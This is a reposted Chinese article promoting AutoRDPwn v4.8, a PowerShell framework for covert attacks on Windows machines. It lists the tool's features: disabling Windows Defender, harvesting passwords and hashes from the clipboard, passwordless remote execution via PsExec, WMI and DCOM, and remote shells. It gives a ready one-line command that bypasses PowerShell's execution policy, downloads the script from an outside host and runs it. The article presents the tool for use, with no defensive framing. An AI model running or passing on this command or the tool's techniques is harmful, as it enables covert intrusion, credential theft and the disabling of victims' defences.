AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架

栏目: 编程工具 · 发布时间: 6年前

内容简介:今天给大家介绍的是一款名叫AutoRDPwn的隐蔽型攻击框架,实际上AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击。这个PowerShell4.0或更高版本。

今天给大家介绍的是一款名叫AutoRDPwn的隐蔽型攻击框架,实际上AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击。这个 漏洞 允许远程攻击者在用户毫不知情的情况下查看用户的桌面,甚至还可以通过恶意请求来实现桌面的远程控制。

AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架

环境要求

PowerShell4.0或更高版本。

新版本v 4.8增加的功能

兼容PowerShell 4.0

自动复制粘贴剪切板中的内容(密码、哈希等)

自动屏蔽Windows Defender(采用了四种不同的方法)

无需密码即可利用PSexec、WMI和Invoke-Command实现远程代码执行

新增攻击方式:DCOM无密码执行

新增攻击模块:远程访问/Metasploit Web传送

新增攻击模块:远程VNC服务器(针对遗留环境)

自动填写主机名、用户名和密码域

可使用-noadmin参数在没有管理员权限的情况下运行攻击模块

工具使用

这款应用程序可以直接在本地使用,也可以远程使用,或者是在两台设备间使用。在引入了额外功能模块之后,该 工具 甚至还可以导出哈希或密码,获取远程Shell,上传或下载文件,甚至是破解无线网络的密码以及恢复RDP连接历史记录等等。

一行命令即可执行

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfileAutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架

我们可以在程序的主菜单中查看和选择需要使用或加载的攻击模块:

[1] –PsExec
[2] –Pass the Hash
[3] –Windows Management Instrumentation
[4] –Schedule Task / PSSession
[5] –Windows Remote Assistance

工具的详细使用文档:【 传送门

工具截图

AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架 AutoRDPwn v4.8:一款功能强大的隐蔽型攻击框架

项目地址

AutoRDPwn:【 GitHub传送门

* 参考来源: arthastang ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

企业IT架构转型之道:阿里巴巴中台战略思想与架构实战

企业IT架构转型之道:阿里巴巴中台战略思想与架构实战

钟华 / 机械工业出版社 / 2017-4-1 / 79

在当今整个中国社会都处于互联网转型的浪潮中,不管是政府职能单位、业务规模庞大的央企,还是面临最激烈竞争的零售行业都处于一个重要的转折点,这个转折对企业业务模式带来了冲击,当然也给企业的信息中心部门带来了挑战:如何构建IT系统架构更好地满足互联网时代下企业业务发展的需要。阿里巴巴的共享服务理念以及企业级互联网架构建设的思路,给这些企业带来了不少新的思路,这也是我最终决定写这本书的最主要原因。本书从阿......一起来看看 《企业IT架构转型之道:阿里巴巴中台战略思想与架构实战》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试